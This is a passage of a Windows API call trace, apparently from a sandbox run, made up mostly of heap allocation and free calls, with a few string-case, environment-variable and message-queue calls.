Size=0x4) returned 0x24b1c38 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0264.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0264.089] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0264.090] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0264.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0264.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0264.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0264.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0264.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.094] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.094] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0264.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0264.095] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.095] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0264.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.096] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0264.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0264.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0264.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0264.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0264.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0264.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0264.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.099] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0264.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0264.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.100] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0264.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0264.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 